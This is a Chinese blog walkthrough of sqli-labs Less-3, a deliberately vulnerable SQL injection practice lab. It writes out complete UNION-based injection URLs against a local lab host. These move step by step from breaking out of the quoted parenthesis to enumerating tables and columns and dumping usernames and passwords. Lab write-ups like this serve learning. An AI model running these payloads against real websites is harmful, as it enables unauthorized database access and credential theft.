zoukankan      html  css  js  c++  java
  • sql-lab 第三关

    开始第三关,打开靶机,

     Please input the ID as parameter with numeric value说的是请以数字值作为参数输入用户标示符的意思。

    还是像前面几个测试一下,发现都不符合

    当我输入?id=1'的时候出现了

     然后查看了一下Index.php的源码:$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

    这样便可以确定单引号注入的变形,一个带括号的字符型注入。

    构造pyload:

    http://10.0.68.9/sqli-labs-master/Less-3/?id=1%27)--+

    这样以来就成功了。

    后面的基本就和前几关一样了,首先看看字段的列数,使用order by 构造pyload,4的话是出错的,所以最终pyload为

    http://10.0.68.9/sqli-labs-master/Less-3/?id=1%27)%20order%20by%203--+

     接下来还需要查看显示位,构造pyload:

    http://10.0.68.9/sqli-labs-master/Less-3/?id=00%27)%20union%20select%201,2,3--+

     这样就查出来有两个显示位2,3;

    然后开始爆数据库名:http://10.0.68.9/sqli-labs-master/Less-3/?id=00%27)%20union%20select%201,2,database()--+

     还是这个名字。

    然后爆出表名来:

    http://10.0.68.9/sqli-labs-master/Less-3/?id=00%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

     表名之后便是字段名了:

    http://10.0.68.9/sqli-labs-master/Less-3/?id=00%27)%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+

     字段名出来了最后便是数据了:

    http://10.0.68.9/sqli-labs-master/Less-3/?id=00%27)%20union%20select%201,2,group_concat(0x3a,username,0x3a,password)%20from%20users--+

     这就出来了。

  • 相关阅读:
    FZU 2129 子序列个数(DP)题解
    FZU 2082 过路费(树链剖分 边权)题解
    2019牛客多校第一场E ABBA(DP)题解
    ajax解决csrf的跨站请求伪造
    django实现简单的跨域请求数据
    python 与jQuery之间的接口对应
    GO语言的初次学习
    Django一些常用参数的设置
    auth认证模块
    Django中间件模块的使用
  • 原文地址:https://www.cnblogs.com/awsole/p/13789478.html
Copyright © 2011-2022 走看看